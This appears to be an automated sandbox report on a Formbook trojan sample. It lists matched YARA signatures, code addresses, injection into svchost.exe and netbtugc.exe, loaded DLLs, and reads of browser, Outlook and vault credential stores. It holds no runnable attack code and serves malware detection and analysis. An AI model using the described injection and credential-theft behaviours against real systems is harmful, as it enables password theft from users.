            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039FE8F0 | 4_2_039FE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039DA840 | 4_2_039DA840
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D2840 | 4_2_039D2840
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A4EFA0 | 4_2_03A4EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039C2FC8 | 4_2_039C2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039DCFE0 | 4_2_039DCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A12F28 | 4_2_03A12F28
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A72F30 | 4_2_03A72F30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039F0F30 | 4_2_039F0F30
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A44F40 | 4_2_03A44F40
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039E2E90 | 4_2_039E2E90
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8CE93 | 4_2_03A8CE93
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8EEDB | 4_2_03A8EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8EE26 | 4_2_03A8EE26
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D0E59 | 4_2_039D0E59
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039E8DBF | 4_2_039E8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039CADE0 | 4_2_039CADE0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039DAD00 | 4_2_039DAD00
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A6CD1F | 4_2_03A6CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A70CB5 | 4_2_03A70CB5
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039C0CF2 | 4_2_039C0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D0C00 | 4_2_039D0C00
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A1739A | 4_2_03A1739A
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8132D | 4_2_03A8132D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039BD34C | 4_2_039BD34C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D52A0 | 4_2_039D52A0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A712ED | 4_2_03A712ED
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039EB2C0 | 4_2_039EB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039DB1B0 | 4_2_039DB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A9B16B | 4_2_03A9B16B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A0516C | 4_2_03A0516C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039BF172 | 4_2_039BF172
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A870E9 | 4_2_03A870E9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8F0E0 | 4_2_03A8F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D70C0 | 4_2_039D70C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A7F0CC | 4_2_03A7F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8F7B0 | 4_2_03A8F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A816CC | 4_2_03A816CC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A6D5B0 | 4_2_03A6D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A87571 | 4_2_03A87571
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8F43F | 4_2_03A8F43F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039C1460 | 4_2_039C1460
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039EFB80 | 4_2_039EFB80
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A45BF0 | 4_2_03A45BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A0DBF9 | 4_2_03A0DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8FB76 | 4_2_03A8FB76
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A15AA0 | 4_2_03A15AA0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A71AA3 | 4_2_03A71AA3
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A6DAAC | 4_2_03A6DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A7DAC6 | 4_2_03A7DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A43A6C | 4_2_03A43A6C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8FA49 | 4_2_03A8FA49
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A87A46 | 4_2_03A87A46
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D9950 | 4_2_039D9950
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039EB950 | 4_2_039EB950
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D38E0 | 4_2_039D38E0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A3D800 | 4_2_03A3D800
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D1F92 | 4_2_039D1F92
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8FFB1 | 4_2_03A8FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03993FD2 | 4_2_03993FD2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03993FD5 | 4_2_03993FD5
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8FF09 | 4_2_03A8FF09
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D9EB0 | 4_2_039D9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039EFDC0 | 4_2_039EFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A87D73 | 4_2_03A87D73
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_039D3D40 | 4_2_039D3D40
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A81D5A | 4_2_03A81D5A
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A8FCF2 | 4_2_03A8FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03A49C32 | 4_2_03A49C32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_032A15E0 | 4_2_032A15E0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0329C7C7 | 4_2_0329C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0329C7D0 | 4_2_0329C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0329AA70 | 4_2_0329AA70
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0329C9F0 | 4_2_0329C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_032A30EE | 4_2_032A30EE
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_032A30F0 | 4_2_032A30F0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_032B9FD0 | 4_2_032B9FD0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0388A0AF | 4_2_0388A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0388B9D6 | 4_2_0388B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0388B8B4 | 4_2_0388B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0388ADD8 | 4_2_0388ADD8
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0388BD6C | 4_2_0388BD6C
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: String function: 00A67F41 appears 35 times
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: String function: 00A80D27 appears 70 times
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: String function: 00A88B40 appears 42 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 57 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 275 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 100 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03A17E54 appears 102 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03A3EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 039BB970 appears 279 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03A4F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03A05130 appears 50 times
            Source: opp46lGmxd.exe, 00000000.00000003.1388345480.0000000003F53000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs opp46lGmxd.exe
            Source: opp46lGmxd.exe, 00000000.00000003.1384841864.00000000040AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs opp46lGmxd.exe
            Source: opp46lGmxd.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY - Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine - Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/13
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00ACA2D5 GetLastError,FormatMessageW, 0_2_00ACA2D5
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00AB8713 AdjustTokenPrivileges,CloseHandle, 0_2_00AB8713
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00AB8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00AB8CC3
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00ACB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00ACB59E
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00ADF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00ADF121
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00AD86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_00AD86D0
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Code function: 0_2_00A64FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00A64FE9
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - File created: C:\Users\user\AppData\Local\Temp\aut908D.tmp
            Source: opp46lGmxd.exe - Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe - File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000004.00000003.1735535328.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1733218388.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3848803016.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3848803016.00000000035E1000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: opp46lGmxd.exe - ReversingLabs: Detection: 57%
            Source: opp46lGmxd.exe - Virustotal: Detection: 67%
            Source: unknown - Process created: C:\Users\user\Desktop\opp46lGmxd.exe "C:\Users\user\Desktop\opp46lGmxd.exe"
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\opp46lGmxd.exe"
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe - Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe - Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: version.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\opp46lGmxd.exe - Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe - Section loaded: wininet.dll
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe - Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe - Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe - Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe - Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe - Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe - Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: opp46lGmxd.exe - Static file information: File size 1161728 > 1048576
            Source: opp46lGmxd.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: opp46lGmxd.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: opp46lGmxd.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: opp46lGmxd.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: opp46lGmxd.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: opp46lGmxd.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: opp46lGmxd.exe - Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3851208680.0000000000B4E000.00000002.00000001.01000000.00000004.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613457617.0000000000B4E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: opp46lGmxd.exe, 00000000.00000003.1387288056.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, opp46lGmxd.exe, 00000000.00000003.1384841864.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1443750275.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445609294.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003990000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1539597721.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1536856304.0000000003621000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: opp46lGmxd.exe, 00000000.00000003.1387288056.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, opp46lGmxd.exe, 00000000.00000003.1384841864.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1443750275.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1536856672.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1445609294.0000000003900000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3854578563.0000000003990000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1539597721.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3854578563.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1536856304.0000000003621000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1536640722.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1505651031.000000000341A000.00000004.00000020.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000003.1476557144.0000000000BEB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3855652610.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1840693063.000000002EBAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3848803016.000000000352E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3855652610.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1840693063.000000002EBAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1536640722.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1505651031.000000000341A000.00000004.00000020.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000003.1476557144.0000000000BEB000.00000004.00000001.00020000.00000000.sdmp
            Source: opp46lGmxd.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: opp46lGmxd.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: opp46lGmxd.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: opp46lGmxd.exe - Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
